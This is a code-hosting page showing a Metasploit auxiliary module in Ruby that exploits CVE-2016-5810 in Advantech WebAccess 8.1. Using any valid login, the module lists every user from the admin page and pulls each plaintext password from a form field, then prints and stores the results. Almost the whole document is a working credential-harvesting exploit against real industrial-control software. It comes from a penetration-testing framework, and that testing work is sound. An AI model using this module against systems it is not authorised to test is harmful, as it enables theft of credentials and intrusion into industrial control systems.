Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/advantech_webaccess_creds.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",

14
        'Description' => %q{

15
          This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.

16
          Although authentication is required, any level of user permission can exploit this vulnerability.

17


18
          Note that 8.2 is not suitable for this.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154

23
          'sinn3r', # Metasploit module

24
        ],

25
        'References' => [

26
          ['CVE', '2016-5810'],

27
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']

28
        ],

29
        'DisclosureDate' => '2017-01-21',

30
        'Notes' => {

31
          'Reliability' => UNKNOWN_RELIABILITY,

32
          'Stability' => UNKNOWN_STABILITY,

33
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

34
        }

35
      )

36
    )

37


38
    register_options(

39
      [

40
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),

41
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),

42
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),

43
      ]

44
    )

45
  end

46


47
  def do_login

48
    vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

49


50
    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')

51


52
    res = send_request_cgi({

53
      'method' => 'POST',

54
      'uri' => uri,

55
      'vars_post' => {

56
        'page' => '/',

57
        'pos' => '',

58
        'username' => datastore['WEBACCESSUSER'],

59
        'password' => datastore['WEBACCESSPASS'],

60
        'remMe' => '',

61
        'submit1' => 'Login'

62
      }

63
    })

64


65
    unless res

66
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')

67
    end

68


69
    if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'

70
      print_good("Logged in as #{datastore['WEBACCESSUSER']}")

71
      report_cred(

72
        user: datastore['WEBACCESSUSER'],

73
        password: datastore['WEBACCESSPASS'],

74
        status: Metasploit::Model::Login::Status::SUCCESSFUL

75
      )

76
      return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''

77
    end

78


79
    print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

80


81
    nil

82
  end

83


84
  def get_user_cred_detail(sid, user)

85
    vprint_status("Gathering password for user: #{user}")

86


87
    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')

88


89
    res = send_request_cgi({

90
      'method' => 'GET',

91
      'uri' => uri,

92
      'cookie' => sid,

93
      'vars_get' => {

94
        'uname' => user

95
      }

96
    })

97


98
    unless res

99
      print_error("Unable to gather password for user #{user} due to a connection timeout")

100
      return nil

101
    end

102


103
    html = res.get_html_document

104
    pass_field = html.at('input[@name="Password"]')

105


106
    pass_field ? pass_field.attributes['value'].text : nil

107
  end

108


109
  def get_users_page(sid)

110
    vprint_status("Checking user page...")

111


112
    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')

113


114
    res = send_request_cgi({

115
      'method' => 'GET',

116
      'uri' => uri,

117
      'cookie' => sid

118
    })

119


120
    unless res

121
      fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')

122
    end

123


124
    html = res.get_html_document

125


126
    users = html.search('a').map { |a|

127
      Rex::Text.uri_decode(a.attributes['href'].text.scan(/broadWeb\/user\/upAdminPg\.asp\?uname=(.+)/).flatten.first || '')

128
    }.delete_if { |user| user.blank? }

129


130
    users

131
  end

132


133
  def report_cred(opts)

134
    service_data = {

135
      address: rhost,

136
      port: rport,

137
      service_name: 'webaccess',

138
      protocol: 'tcp',

139
      workspace_id: myworkspace_id

140
    }

141


142
    credential_data = {

143
      origin_type: :service,

144
      module_fullname: fullname,

145
      username: opts[:user],

146
      private_data: opts[:password],

147
      private_type: :password

148
    }.merge(service_data)

149


150
    login_data = {

151
      last_attempted_at: DateTime.now,

152
      core: create_credential(credential_data),

153
      status: opts[:status],

154
      proof: opts[:proof]

155
    }.merge(service_data)

156


157
    create_credential_login(login_data)

158
  end

159


160
  def run

161
    cookie = do_login

162
    users = get_users_page(cookie)

163


164
    users.each do |user|

165
      pass = get_user_cred_detail(cookie, user)

166


167
      if pass

168
        report_cred(

169
          user: user,

170
          password: pass,

171
          status: Metasploit::Model::Login::Status::SUCCESSFUL,

172
          proof: 'AdminPg.asp'

173
        )

174


175
        print_good("Found password: #{user}:#{pass}")

176
      end

177
    end

178
  end

179
end

180


181